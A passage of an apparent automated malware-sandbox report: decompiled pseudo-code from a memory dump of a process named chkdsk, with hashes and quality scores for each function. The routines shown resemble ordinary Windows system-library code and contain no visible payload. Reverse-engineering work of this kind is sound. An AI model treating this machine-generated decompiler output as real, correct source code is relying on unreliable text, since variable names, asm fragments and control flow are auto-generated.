                                                      						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                      						 *_t59 = _t49;
                                                      						if( *_t49 != 0x53445352) {
                                                      							goto L18;
                                                      						}
                                                      						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                      						return 0;
                                                      						L18:
                                                      						_t63 = _t63 + 0x1c;
                                                      						_t74 = _t74 + 1;
                                                      					} while (_t74 < _t69);
                                                      					goto L19;
                                                      				}
                                                      				 *_t73 = _t41;
                                                      				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                      				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                      				 *_t70 = _t73;
                                                      				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                      				return 0;
                                                      			}



























                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction ID: 1e91f3a892d6a06f6721dfe3f0f6a495f6b3dc58fe40e471722ac91b3dc1bcae
                                                      • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                      • Instruction Fuzzy Hash: 0A2150B1A00605EFDB21DF59C845AAAF7F8EB44354F1488AEE995AB250E370FD44CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 59%
                                                      			E04DB3B7A(void* __ecx) {
                                                      				signed int _v8;
                                                      				char _v12;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t17;
                                                      				intOrPtr _t26;
                                                      				void* _t35;
                                                      				void* _t38;
                                                      				void* _t41;
                                                      				intOrPtr _t44;
                                                      
                                                      				_t17 =  *0x4e784c4; // 0x0
                                                      				_v12 = 1;
                                                      				_v8 =  *0x4e784c0 * 0x4c;
                                                      				_t41 = __ecx;
                                                      				_t35 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4e784c0 * 0x4c);
                                                      				if(_t35 == 0) {
                                                      					_t44 = 0xc0000017;
                                                      				} else {
                                                      					_push( &_v8);
                                                      					_push(_v8);
                                                      					_push(_t35);
                                                      					_push(4);
                                                      					_push( &_v12);
                                                      					_push(0x6b);
                                                      					_t44 = E04DCAA90();
                                                      					_v20 = _t44;
                                                      					if(_t44 >= 0) {
                                                      						E04DCFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4e784c0 * 0xc);
                                                      						_t38 = _t35;
                                                      						if(_t35 < _v8 + _t35) {
                                                      							do {
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								asm("movsd");
                                                      								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                      							} while (_t38 < _v8 + _t35);
                                                      							_t44 = _v20;
                                                      						}
                                                      					}
                                                      					_t26 =  *0x4e784c4; // 0x0
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                      				}
                                                      				return _t44;
                                                      			}













                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28ed711b4957b395f48db9137beb303c9a825a0ac82f9ebfb8e7ea000d99e481
                                                      • Instruction ID: d40fb4a0f7c9503006b2abc4537c29fae57ac760365ecf8a3fdfa9b8c23e049e
                                                      • Opcode Fuzzy Hash: 28ed711b4957b395f48db9137beb303c9a825a0ac82f9ebfb8e7ea000d99e481
                                                      • Instruction Fuzzy Hash: 852179B2A00108AFD705DF98CD85BAAB7A9FB44718F250068E909AB251D7B5ED119BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E04E06CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                      				char _v8;
                                                      				char _v12;
                                                      				char _v16;
                                                      				char _v20;
                                                      				char _v28;
                                                      				char _v36;
                                                      				char _v52;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed char* _t21;
                                                      				void* _t24;
                                                      				void* _t36;
                                                      				void* _t38;
                                                      				void* _t46;
                                                      
                                                      				_push(_t36);
                                                      				_t46 = __edx;
                                                      				_v12 = 0;
                                                      				_v8 = 0;
                                                      				_v20 = 0;
                                                      				_v16 = 0;
                                                      				if(E04DA7D50() == 0) {
                                                      					_t21 = 0x7ffe0384;
                                                      				} else {
                                                      					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                      				}
                                                      				if( *_t21 != 0) {
                                                      					_t21 =  *[fs:0x30];
                                                      					if((_t21[0x240] & 0x00000004) != 0) {
                                                      						if(E04DA7D50() == 0) {
                                                      							_t21 = 0x7ffe0385;
                                                      						} else {
                                                      							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                      						}
                                                      						if(( *_t21 & 0x00000020) != 0) {
                                                      							_t56 = _t46;
                                                      							if(_t46 == 0) {
                                                      								_t46 = 0x4d65c80;
                                                      							}
                                                      							_push(_t46);
                                                      							_push( &_v12);
                                                      							_t24 = E04DBF6E0(_t36, 0, _t46, _t56);
                                                      							_push(_a4);
                                                      							_t38 = _t24;
                                                      							_push( &_v28);
                                                      							_t21 = E04DBF6E0(_t38, 0, _t46, _t56);
                                                      							if(_t38 != 0) {
                                                      								if(_t21 != 0) {
                                                      									E04E07016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                      									L04DA2400( &_v52);
                                                      								}
                                                      								_t21 = L04DA2400( &_v28);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t21;
                                                      			}




















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7db944d9be854c4ce369af1eb136e5fc3d8c512de0bbeb016a014cbb95c7d35a
                                                      • Instruction ID: b83234da4f532fff035f76e154bbb8b20de1cad49ffcff2c8c0154d4b84266e8
                                                      • Opcode Fuzzy Hash: 7db944d9be854c4ce369af1eb136e5fc3d8c512de0bbeb016a014cbb95c7d35a
                                                      • Instruction Fuzzy Hash: 882122326042459BD711EF39C944BABBBECEF81358F044456F850C72A0E734E998C6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E04E5070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                      				char _v8;
                                                      				intOrPtr _v11;
                                                      				signed int _v12;
                                                      				intOrPtr _v15;
                                                      				signed int _v16;
                                                      				intOrPtr _v28;
                                                      				void* __ebx;
                                                      				char* _t32;
                                                      				signed int* _t38;
                                                      				signed int _t60;
                                                      
                                                      				_t38 = __ecx;
                                                      				_v16 = __edx;
                                                      				_t60 = E04E507DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                      				if(_t60 != 0) {
                                                      					_t7 = _t38 + 0x38; // 0x29cd5903
                                                      					_push( *_t7);
                                                      					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                      					_push( *_t9);
                                                      					_v12 = _a8 << 0xc;
                                                      					_t11 = _t38 + 4; // 0x5de58b5b
                                                      					_push(0x4000);
                                                      					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                      					E04E4AFDE( &_v8,  &_v12);
                                                      					E04E51293(_t38, _v28, _t60);
                                                      					if(E04DA7D50() == 0) {
                                                      						_t32 = 0x7ffe0380;
                                                      					} else {
                                                      						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      					}
                                                      					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                      						E04E414FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                      					}
                                                      				}
                                                      				return  ~_t60;
                                                      			}














                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction ID: 55c23a359661fa4adf56228340b0549de734f2490e46200d94e14e39230704c5
                                                      • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                      • Instruction Fuzzy Hash: A92126363042009FD705EF18D884BAABBA5EFC4754F048569FD958B391D730E909CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E04DAAE73(intOrPtr __ecx, void* __edx) {
                                                      				intOrPtr _v8;
                                                      				void* _t19;
                                                      				char* _t22;
                                                      				signed char* _t24;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t27;
                                                      				void* _t31;
                                                      				intOrPtr _t36;
                                                      				char* _t38;
                                                      				signed char* _t42;
                                                      
                                                      				_push(__ecx);
                                                      				_t31 = __edx;
                                                      				_v8 = __ecx;
                                                      				_t19 = E04DA7D50();
                                                      				_t38 = 0x7ffe0384;
                                                      				if(_t19 != 0) {
                                                      					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      				} else {
                                                      					_t22 = 0x7ffe0384;
                                                      				}
                                                      				_t42 = 0x7ffe0385;
                                                      				if( *_t22 != 0) {
                                                      					if(E04DA7D50() == 0) {
                                                      						_t24 = 0x7ffe0385;
                                                      					} else {
                                                      						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      					}
                                                      					if(( *_t24 & 0x00000010) != 0) {
                                                      						goto L17;
                                                      					} else {
                                                      						goto L3;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					_t27 = E04DA7D50();
                                                      					if(_t27 != 0) {
                                                      						_t27 =  *[fs:0x30];
                                                      						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                      					}
                                                      					if( *_t38 != 0) {
                                                      						_t27 =  *[fs:0x30];
                                                      						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                      							goto L5;
                                                      						}
                                                      						_t27 = E04DA7D50();
                                                      						if(_t27 != 0) {
                                                      							_t27 =  *[fs:0x30];
                                                      							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                      						}
                                                      						if(( *_t42 & 0x00000020) != 0) {
                                                      							L17:
                                                      							_t25 = _v8;
                                                      							_t36 = 0;
                                                      							if(_t25 != 0) {
                                                      								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                      							}
                                                      							_t27 = E04E07794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                      						}
                                                      						goto L5;
                                                      					} else {
                                                      						L5:
                                                      						return _t27;
                                                      					}
                                                      				}
                                                      			}














                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction ID: 345f30b95f6d5a29c15b89413a1f869e1d322f145dedf69f36bee895081766b3
                                                      • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                      • Instruction Fuzzy Hash: E521BB71701680DBEB269B29C944B2577E8FF44344F0A00E1EE048B7A2E77AFD50C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E04E07794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _t21;
                                                      				void* _t24;
                                                      				intOrPtr _t25;
                                                      				void* _t36;
                                                      				short _t39;
                                                      				signed char* _t42;
                                                      				unsigned int _t46;
                                                      				void* _t50;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t21 =  *0x4e77b9c; // 0x0
                                                      				_t46 = _a8;
                                                      				_v12 = __edx;
                                                      				_v8 = __ecx;
                                                      				_t4 = _t46 + 0x2e; // 0x2e
                                                      				_t36 = _t4;
                                                      				_t24 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                      				_t50 = _t24;
                                                      				if(_t50 != 0) {
                                                      					_t25 = _a4;
                                                      					if(_t25 == 5) {
                                                      						L3:
                                                      						_t39 = 0x14b1;
                                                      					} else {
                                                      						_t39 = 0x14b0;
                                                      						if(_t25 == 6) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      					 *((short*)(_t50 + 6)) = _t39;
                                                      					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                      					_t11 = _t50 + 0x2c; // 0x2c
                                                      					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                      					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                      					E04DCF3E0(_t11, _a12, _t46);
                                                      					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                      					if(E04DA7D50() == 0) {
                                                      						_t42 = 0x7ffe0384;
                                                      					} else {
                                                      						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      					}
                                                      					_push(_t50);
                                                      					_t19 = _t36 - 0x20; // 0xe
                                                      					_push(0x403);
                                                      					_push( *_t42 & 0x000000ff);
                                                      					E04DC9AE0();
                                                      					_t24 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                      				}
                                                      				return _t24;
                                                      			}














                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 04810072137b8e72fa9ddca6ed6220d9f405e63651a6d57757d6921e6a88ae31
                                                      • Instruction ID: 732e6bcbea36a44b536edd319ddf4b35d02aec7d7013ed9999850f4030024161
                                                      • Opcode Fuzzy Hash: 04810072137b8e72fa9ddca6ed6220d9f405e63651a6d57757d6921e6a88ae31
                                                      • Instruction Fuzzy Hash: C421DE72A00604EBC725DF69D880EABB7A9EF48384F14416DF90AC7790E634F900CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E04DBFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				intOrPtr _v8;
                                                      				void* _t19;
                                                      				intOrPtr _t29;
                                                      				intOrPtr _t32;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t37;
                                                      				intOrPtr* _t40;
                                                      
                                                      				_t35 = __edx;
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t37 = 0;
                                                      				_v8 = __edx;
                                                      				_t29 = __ecx;
                                                      				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                      					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                      					L3:
                                                      					_t19 = _a4 - 4;
                                                      					if(_t19 != 0) {
                                                      						if(_t19 != 1) {
                                                      							L7:
                                                      							return _t37;
                                                      						}
                                                      						if(_t35 == 0) {
                                                      							L11:
                                                      							_t37 = 0xc000000d;
                                                      							goto L7;
                                                      						}
                                                      						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                      							_t35 = _v8;
                                                      						}
                                                      						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                      						goto L7;
                                                      					}
                                                      					if(_t29 == 0) {
                                                      						goto L11;
                                                      					}
                                                      					_t32 =  *_t40;
                                                      					if(_t32 != 0) {
                                                      						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                      						E04D976E2( *_t40);
                                                      					}
                                                      					 *_t40 = _t29;
                                                      					goto L7;
                                                      				}
                                                      				_t40 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                      				if(_t40 == 0) {
                                                      					_t37 = 0xc0000017;
                                                      					goto L7;
                                                      				}
                                                      				_t35 = _v8;
                                                      				 *_t40 = 0;
                                                      				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                      				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                      				goto L3;
                                                      			}











                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction ID: 4bd66e8bb92a255f2cf16334048bdde0d9d23796a00a69ee35695d4ec5bb06f4
                                                      • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                      • Instruction Fuzzy Hash: D0217972A00A44DBD735CF09C940EA6B7E5FB94B10F25816EE98AC7610E730FC00DB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E04D89240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t33;
                                                      				intOrPtr _t37;
                                                      				intOrPtr _t41;
                                                      				intOrPtr* _t46;
                                                      				void* _t48;
                                                      				intOrPtr _t50;
                                                      				intOrPtr* _t60;
                                                      				void* _t61;
                                                      				intOrPtr _t62;
                                                      				intOrPtr _t65;
                                                      				void* _t66;
                                                      				void* _t68;
                                                      
                                                      				_push(0xc);
                                                      				_push(0x4e5f708);
                                                      				E04DDD08C(__ebx, __edi, __esi);
                                                      				_t65 = __ecx;
                                                      				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                      				if( *(__ecx + 0x24) != 0) {
                                                      					_push( *(__ecx + 0x24));
                                                      					E04DC95D0();
                                                      					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                      				}
                                                      				L6();
                                                      				L6();
                                                      				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                      				E04DC95D0();
                                                      				_t33 =  *0x4e784c4; // 0x0
                                                      				L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                      				_t37 =  *0x4e784c4; // 0x0
                                                      				L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                      				_t41 =  *0x4e784c4; // 0x0
                                                      				E04DA2280(L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4e786b4);
                                                      				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                      				_t46 = _t65 + 0xe8;
                                                      				_t62 =  *_t46;
                                                      				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                      				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                      					_t61 = 3;
                                                      					asm("int 0x29");
                                                      					_push(_t65);
                                                      					_t66 = _t61;
                                                      					_t23 = _t66 + 0x14; // 0x8df8084c
                                                      					_push( *_t23);
                                                      					E04DC95D0();
                                                      					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                      					_push( *_t24);
                                                      					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                      					_t48 = E04DC95D0();
                                                      					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                      					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                      					return _t48;
                                                      				} else {
                                                      					 *_t60 = _t62;
                                                      					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                      					 *(_t68 - 4) = 0xfffffffe;
                                                      					E04D89325();
                                                      					_t50 =  *0x4e784c4; // 0x0
                                                      					return E04DDD0D1(L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                      				}
                                                      			}
















                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 285170e1e147327fc822676c9b741aa4c455696c5a4bb3707aba5610f968e4f4
                                                      • Instruction ID: 896aaf08fa3b4226d4efe6ec846433caf5292790836020fd6c46a3684db8c4f8
                                                      • Opcode Fuzzy Hash: 285170e1e147327fc822676c9b741aa4c455696c5a4bb3707aba5610f968e4f4
                                                      • Instruction Fuzzy Hash: C0216672241600DFD721FF68CA10B2AB7B9FF08718F1045ACA04A866B1DA34F951DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E04DBB390(void* __ecx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				signed char _t12;
                                                      				signed int _t16;
                                                      				signed int _t21;
                                                      				void* _t28;
                                                      				signed int _t30;
                                                      				signed int _t36;
                                                      				signed int _t41;
                                                      
                                                      				_push(__ecx);
                                                      				_t41 = _a4 + 0xffffffb8;
                                                      				E04DA2280(_t12, 0x4e78608);
                                                      				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                      				asm("sbb edi, edi");
                                                      				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                      				_v8 = _t36;
                                                      				asm("lock cmpxchg [ebx], ecx");
                                                      				_t30 = 1;
                                                      				if(1 != 1) {
                                                      					while(1) {
                                                      						_t21 = _t30 & 0x00000006;
                                                      						_t16 = _t30;
                                                      						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                      						asm("lock cmpxchg [edi], esi");
                                                      						if(_t16 == _t30) {
                                                      							break;
                                                      						}
                                                      						_t30 = _t16;
                                                      					}
                                                      					_t36 = _v8;
                                                      					if(_t21 == 2) {
                                                      						_t16 = E04DC00C2(0x4e78608, 0, _t28);
                                                      					}
                                                      				}
                                                      				if(_t36 != 0) {
                                                      					_t16 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                      				}
                                                      				return _t16;
                                                      			}












                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00f984276fea9390f96dfe811af73b5d083a98302775b651248f63cb12ee1a79
                                                      • Instruction ID: c7a37c402fb174616b648b70b6d9617f17cb641a63ebe869e9dd042530af32e9
                                                      • Opcode Fuzzy Hash: 00f984276fea9390f96dfe811af73b5d083a98302775b651248f63cb12ee1a79
                                                      • Instruction Fuzzy Hash: 22118833301210DBDF289A559D81A6B7296FBC5730B29052ADA5A87780D932FC02C2D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E04E14257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr* _t18;
                                                      				intOrPtr _t24;
                                                      				intOrPtr* _t27;
                                                      				intOrPtr* _t30;
                                                      				intOrPtr* _t31;
                                                      				intOrPtr _t33;
                                                      				intOrPtr* _t34;
                                                      				intOrPtr* _t35;
                                                      				void* _t37;
                                                      				void* _t38;
                                                      				void* _t39;
                                                      				void* _t43;
                                                      
                                                      				_t39 = __eflags;
                                                      				_t35 = __edi;
                                                      				_push(8);
                                                      				_push(0x4e608d0);
                                                      				E04DDD08C(__ebx, __edi, __esi);
                                                      				_t37 = __ecx;
                                                      				E04E141E8(__ebx, __edi, __ecx, _t39);
                                                      				E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                      				_t18 = _t37 + 8;
                                                      				_t33 =  *_t18;
                                                      				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                      				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                      					L8:
                                                      					_push(3);
                                                      					asm("int 0x29");
                                                      				} else {
                                                      					 *_t27 = _t33;
                                                      					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                      					_t35 = 0x4e787e4;
                                                      					_t18 =  *0x4e787e0; // 0x0
                                                      					while(_t18 != 0) {
                                                      						_t43 = _t18 -  *0x4e75cd0; // 0xffffffff
                                                      						if(_t43 >= 0) {
                                                      							_t31 =  *0x4e787e4; // 0x0
                                                      							_t18 =  *_t31;
                                                      							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                      								goto L8;
                                                      							} else {
                                                      								 *0x4e787e4 = _t18;
                                                      								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                      								L04D87055(_t31 + 0xfffffff8);
                                                      								_t24 =  *0x4e787e0; // 0x0
                                                      								_t18 = _t24 - 1;
                                                      								 *0x4e787e0 = _t18;
                                                      								continue;
                                                      							}
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      				}
                                                      				L9:
                                                      				__eflags =  *0x4e75cd0;
                                                      				if( *0x4e75cd0 <= 0) {
                                                      					L04D87055(_t37);
                                                      				} else {
                                                      					_t30 = _t37 + 8;
                                                      					_t34 =  *0x4e787e8; // 0x0
                                                      					__eflags =  *_t34 - _t35;
                                                      					if( *_t34 != _t35) {
                                                      						goto L8;
                                                      					} else {
                                                      						 *_t30 = _t35;
